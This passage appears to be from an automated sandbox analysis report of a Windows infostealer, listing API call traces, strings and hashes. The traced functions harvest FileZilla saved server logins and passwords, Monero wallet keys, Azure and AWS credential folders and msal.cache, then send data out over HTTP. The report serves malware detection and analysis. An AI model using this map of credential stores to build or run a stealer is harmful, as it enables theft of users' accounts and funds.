                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB0662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB0692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB06AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BB06C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00BB06D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 00BB06E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB06F3
                                  • lstrcat.KERNEL32(?,00BC1770), ref: 00BB0702
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0715
                                  • lstrcat.KERNEL32(?,00BC1774), ref: 00BB0724
                                  • lstrcat.KERNEL32(?,login: ), ref: 00BB0733
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0746
                                  • lstrcat.KERNEL32(?,00BC1780), ref: 00BB0755
                                  • lstrcat.KERNEL32(?,password: ), ref: 00BB0764
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0777
                                  • lstrcat.KERNEL32(?,00BC1790), ref: 00BB0786
                                  • lstrcat.KERNEL32(?,00BC1794), ref: 00BB0795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB07EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 558f1dbea71e8f349ac892ab6b395c5daa8d0404ac5d2fe57e44e2f3c86bf6a5
                                  • Instruction ID: 5bcc66b543f9986c3681721d71072ac5644637d5bfc555e6d843ebae02137f0f
                                  • Opcode Fuzzy Hash: 558f1dbea71e8f349ac892ab6b395c5daa8d0404ac5d2fe57e44e2f3c86bf6a5
                                  • Instruction Fuzzy Hash: BDD10E75D10208AFCB14FBE4DD96EFE77B9AF14301F404598F116B60A2DEB0AA48CB61
                                  Function 00BA59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA5A48
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA5A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA5BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0130EE78,00000000,?,0130A958,00000000,?,00BC1B4C), ref: 00BA5EC1
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA5EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA5EEA
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5EFF
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA5F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00BA5F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA5F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BA5F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6000
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA600D
                                  • HttpOpenRequestA.WININET(00000000,0130EE68,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA5C48
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: ed34ce238f31b5672c83aa2b84ba0e5eef22b74a24bbda81549663efe9d970a8
                                  • Instruction ID: cb987b0e214b19189f15f05d4cfd91038bb1781ee2f506e53ccc811a81165bfa
                                  • Opcode Fuzzy Hash: ed34ce238f31b5672c83aa2b84ba0e5eef22b74a24bbda81549663efe9d970a8
                                  • Instruction Fuzzy Hash: CA12CD71D20118BBCB25EBA0DDA6FEEB7B9AF14700F4045D9B11672091EFB06A48CF65
                                  Function 00BACFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BAD1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BAD1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD308
                                  • lstrcat.KERNEL32(?,00BC1570), ref: 00BAD317
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD32A
                                  • lstrcat.KERNEL32(?,00BC1574), ref: 00BAD339
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD34C
                                  • lstrcat.KERNEL32(?,00BC1578), ref: 00BAD35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD36E
                                  • lstrcat.KERNEL32(?,00BC157C), ref: 00BAD37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD390
                                  • lstrcat.KERNEL32(?,00BC1580), ref: 00BAD39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD3B2
                                  • lstrcat.KERNEL32(?,00BC1584), ref: 00BAD3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD3D4
                                  • lstrcat.KERNEL32(?,00BC1588), ref: 00BAD3E3
                                    • Part of subcall function 00BBAB30: lstrlen.KERNEL32(00BA4F55,?,?,00BA4F55,00BC0DDF), ref: 00BBAB3B
                                    • Part of subcall function 00BBAB30: lstrcpy.KERNEL32(00BC0DDF,00000000), ref: 00BBAB95
                                  • lstrlen.KERNEL32(?), ref: 00BAD42A
                                  • lstrlen.KERNEL32(?), ref: 00BAD439
                                    • Part of subcall function 00BBAD80: StrCmpCA.SHLWAPI(00000000,00BC1568,00BAD2A2,00BC1568,00000000), ref: 00BBAD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 4a76613a957911db1b4a0aac5f4077abf556d573edccf01f34702a49f936576b
                                  • Instruction ID: 8857cef69f7cc3dfc119d8a88a896b91094c5ee1b26938eda91c92e8ec652109
                                  • Opcode Fuzzy Hash: 4a76613a957911db1b4a0aac5f4077abf556d573edccf01f34702a49f936576b
                                  • Instruction Fuzzy Hash: 19E13D71D10108AFCF14EBA4DD96EFE77B9AF14301F0045E8F116B61A2DE71AA48CB62
                                  Function 00BACA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0130D968,00000000,?,00BC1544,00000000,?,?), ref: 00BACB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BACB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00BACB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BACBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BACBD9
                                  • StrStrA.SHLWAPI(?,0130D998,00BC0B56), ref: 00BACBF7
                                  • StrStrA.SHLWAPI(00000000,0130DA28), ref: 00BACC1E
                                  • StrStrA.SHLWAPI(?,0130E118,00000000,?,00BC1550,00000000,?,00000000,00000000,?,01309488,00000000,?,00BC154C,00000000,?), ref: 00BACDA2
                                  • StrStrA.SHLWAPI(00000000,0130E198), ref: 00BACDB9
                                    • Part of subcall function 00BAC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC971
                                    • Part of subcall function 00BAC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC97C
                                  • StrStrA.SHLWAPI(?,0130E198,00000000,?,00BC1554,00000000,?,00000000,013093C8), ref: 00BACE5A
                                  • StrStrA.SHLWAPI(00000000,013096A8), ref: 00BACE71
                                    • Part of subcall function 00BAC920: lstrcat.KERNEL32(?,00BC0B47), ref: 00BACA43
                                    • Part of subcall function 00BAC920: lstrcat.KERNEL32(?,00BC0B4B), ref: 00BACA57
                                    • Part of subcall function 00BAC920: lstrcat.KERNEL32(?,00BC0B4E), ref: 00BACA78
                                  • lstrlen.KERNEL32(00000000), ref: 00BACF44
                                  • CloseHandle.KERNEL32(00000000), ref: 00BACF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 9ac0fae920fe3e24c62e49c81b7fd727aee50d35ae8b1cc6b584776f97f0c062
                                  • Instruction ID: d27b07a08355822309d9819638ec6e97322cff854c015b334bef2073d83d9bf6
                                  • Opcode Fuzzy Hash: 9ac0fae920fe3e24c62e49c81b7fd727aee50d35ae8b1cc6b584776f97f0c062
                                  • Instruction Fuzzy Hash: 1FE1C971D10108AFCB14EBA4DDA2FFEBBB9AF54300F404599F11676191EFB06A49CB61
                                  Function 00BB84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0130BBA0,00000000,00020019,00000000,00BC05BE), ref: 00BB8534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB85B6
                                  • wsprintfA.USER32 ref: 00BB85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8629
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: b984c573c502e65926a82d9c210b4b8323c89cd8e73c81a65b18546e603bfbab
                                  • Instruction ID: d8c49ff277f868cc49cc187690235a2a8c17db157e9500607925227d4396766b
                                  • Opcode Fuzzy Hash: b984c573c502e65926a82d9c210b4b8323c89cd8e73c81a65b18546e603bfbab
                                  • Instruction Fuzzy Hash: 1A81E971911118AFDB24DB54CD95FEAB7B8FB48704F5082D8E149A6190DFB06F88CFA0
                                  Function 00BB4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB5000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00BB501D
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4B7C
                                    • Part of subcall function 00BB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00BB4B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00BB50A9
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB4BC1
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4BD7
                                    • Part of subcall function 00BB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4DCD
                                    • Part of subcall function 00BB4B60: FindClose.KERNEL32(000000FF), ref: 00BB4DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB5118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BB5135
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4C00
                                    • Part of subcall function 00BB4B60: StrCmpCA.SHLWAPI(?,00BC08D3), ref: 00BB4C15
                                    • Part of subcall function 00BB4B60: wsprintfA.USER32 ref: 00BB4C32
                                    • Part of subcall function 00BB4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00BB4C6E
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,0130EDA8), ref: 00BB4C9A
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,00BC0FE0), ref: 00BB4CAC
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,?), ref: 00BB4CC0
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,00BC0FE4), ref: 00BB4CD2
                                    • Part of subcall function 00BB4B60: lstrcat.KERNEL32(?,?), ref: 00BB4CE6
                                    • Part of subcall function 00BB4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00BB4CFC
                                    • Part of subcall function 00BB4B60: DeleteFileA.KERNEL32(?), ref: 00BB4D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: e6b5afccdb0158b2536e8ca0cb8767aa1444d92994883f8d84d86126c46b1c90
                                  • Instruction ID: 3d1ec0496870fc15423869e4fa4d6172b5de167af83ff165d1b188e1e404927f
                                  • Opcode Fuzzy Hash: e6b5afccdb0158b2536e8ca0cb8767aa1444d92994883f8d84d86126c46b1c90
                                  • Instruction Fuzzy Hash: F54184BA94420467DB60F770DC57FED73A89B65700F0049D8B299750D2EEF497C88B92
                                  Function 00BB91A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BB91FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
